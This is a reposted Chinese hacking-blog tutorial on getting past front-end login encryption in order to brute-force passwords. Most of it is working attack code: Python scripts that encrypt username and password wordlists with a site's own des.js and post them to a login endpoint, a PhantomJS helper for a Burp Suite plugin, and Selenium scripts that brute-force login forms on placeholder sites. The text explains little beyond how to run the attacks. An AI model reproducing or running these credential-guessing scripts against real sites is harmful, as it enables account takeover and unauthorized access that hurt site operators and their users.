记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

突破前端加密方法总结

2020-02-12 09:13

0x00 执行加密的js文件写脚本生成加密字典

https://yyy.xxx.com/assets/des/des.js

对密码(123456)进行了前端加密传输。

这里还需要从页面源代码找到加密方法的参数

pip install PyExecJS

再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)

加密脚本:生成加密后的用户名和密码

#coding:utf-8
#from selenium import webdriver
import execjs


def mzDes(s,para):
despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")
return despara

with open('des.js','r') as mzCrypto:

s = mzCrypto.read()
with open('users.txt','r') as users: #des username
with open('des_users.txt','w') as f4DesUser:
user = users.readlines()
for u in user:
uname = u.strip()
print uname
desUsername = mzDes(s,uname)
print desUsername
f4DesUser.write(desUsername+'\n')



with open('pwdTop54.txt','r') as pwds: #des password
with open('des_pwds.txt','w') as f4DesPwd:
pwd = pwds.readlines()
for p in pwd:
passwd = p.strip()
print passwd
desPassword = mzDes(s,passwd)
print desPassword
f4DesPwd.write(desPassword+'\n')


这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。

py脚本爆破(单线程):

#coding:utf-8
#from selenium import webdriver
import execjs
import requests
import re




successCount = 0


def mzDes(s,para):
despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")
return despara

with open('des.js','r') as mzCrypto:

s = mzCrypto.read()
with open('users.txt','r') as users: #des username


user = users.readlines()
for u in user:
with open('top50.txt','r') as pwds: #des password
uname = u.strip()
print uname
desUsername = mzDes(s,uname)
print desUsername

pwd = pwds.readlines()
for p in pwd:
passwd = p.strip()
print passwd
desPassword = mzDes(s,passwd)
print desPassword




burp0_url = "https://yyy.xxx.com:443/login"
burp0_cookies = {"acw_tc": "2", "session.id": "5e"}
burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}

rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

#print rsp.headers['content-length']
#if rsp.headers['content-length'] != 23862:
# print 'success!!!'
print len(rsp.content)
if len(rsp.content) != 23862:
print 'success'
successCount = successCount + 1
pattern = re.compile(r'<p class="login-error" id="errorTips">(.*?)</p>')

bruteResult = pattern.search(rsp.text)
print bruteResult

print successCount

如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。

0x01 burpsuite插件jsencrypt

安装phantomjs

https://github.com/c0ny1/jsEncrypter

用法参考readme

编写对应的jsEncrypter_des.js

var webserver = require('webserver');
server = webserver.create();

var host = '127.0.0.1';
var port = '1664';

// 加载实现加密算法的js脚本
var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/

// 处理函数
function js_encrypt(payload){
var newpayload;
/**********在这里编写调用加密函数进行加密的代码************/
//var b = new Base64();
newpayload = strEnc(payload,"key","para0","para1");
/**********************************************************/
return newpayload;
}

if(wasSuccessful){
console.log("[*] load js successful");
console.log("[!] ^_^");
console.log("[*] jsEncrypterJS start!");
console.log("[+] address: http://"+host+":"+port);
}else{
console.log('[*] load js fail!');
}

var service = server.listen(host+':'+port,function(request, response){
try{
if(request.method == 'POST'){
var payload = request.post['payload'];
var encrypt_payload = js_encrypt(payload);
console.log('[+] ' + payload + ':' + encrypt_payload);
response.statusCode = 200;
response.write(encrypt_payload.toString());
response.close();
}else{
response.statusCode = 200;
response.write("^_^\n\rhello jsEncrypter!");
response.close();
}
}catch(e){
console.log('\n-----------------Error Info--------------------')
var fullMessage = "Message: "+e.toString() + ':'+ e.line;
for (var p in e) {
fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
}
console.log(fullMessage);
console.log('---------------------------------------------')
console.log('[*] phantomJS exit!')
phantom.exit();
}
});

0x02 理解js加密算法

如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了

burpsuite的intruder模块自带了很多加密的选项可以直接用

0x03 浏览器自动化爆破

安装selenium
安装浏览器驱动,加入环境变量。

#coding:utf-8



import time
import sys
from selenium import webdriver

reload(sys)
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


browser.get('http://xxx.cn/manage/login.aspx')
browser.implicitly_wait(7)
elem = browser.find_element_by_name("name")
elem.send_keys(user)
elem=browser.find_element_by_name("pws")
elem.send_keys(pwd)

elem=browser.find_element_by_id("submit")
#print browser.current_window_handle
elem.click()

time.sleep(1)
if '当前用户' in browser.page_source:

print 'Login Success:' + user + '|' + pwd
sys.exit()
else:
print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

with open('usernameTop500.txt','r') as fuser:
for user in fuser.readlines():
u = user.strip()
with open('topwdglobal.txt','r') as fpwd:
for pwd in fpwd.readlines():
p = pwd.strip()
print 'testing...' + u,p
BruteLogin(u,p)

browser.quit()



if __name__ == '__main__':
main()

如果有些元素不能直接定位,就尝试用autochain,如:

#coding:utf-8
#Author:LSA
#Descript:selenium for brute
#Data:201812



import time
import sys
from selenium import webdriver
from selenium.webdriver.common import action_chains, keys
import time

reload(sys)
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


browser.get('http://xxx.edu.cn/login.jsp')
browser.implicitly_wait(20)

action = action_chains.ActionChains(browser)

elem = browser.find_element_by_name("j_username")
elem.send_keys(user)

action.perform()

elem=browser.find_element_by_name("j_password")
elem.send_keys(pwd)

action.perform()

elem=browser.find_element_by_name("btn_submit")
#print browser.current_window_handle
#elem.click()

action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)
action.perform()

time.sleep(1)
if '当前用户' in browser.page_source:

print 'Login Success:' + user + '|' + pwd
sys.exit()
else:
print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

with open('usernameTop500.txt','r') as fuser:
for user in fuser.readlines():
u = user.strip()
with open('topwdglobal.txt','r') as fpwd:
for pwd in fpwd.readlines():
p = pwd.strip()
print 'testing...' + u,p
BruteLogin(u,p)

browser.quit()



if __name__ == '__main__':
main()

0x04 misc

  1. 中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。
  2. 断点调试js修改参数
  3. fiddler替换js

可视具体情况使用。

//预览看到代码缩进没了,全部py脚本打包到附件了

brute-encryption.zip (0.003 MB) 下载附件
知识来源: xz.aliyun.com/t/7190

阅读:32879 | 评论:0 | 标签:加密

想收藏或者和大家分享这篇好文章→复制链接地址

“突破前端加密方法总结”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云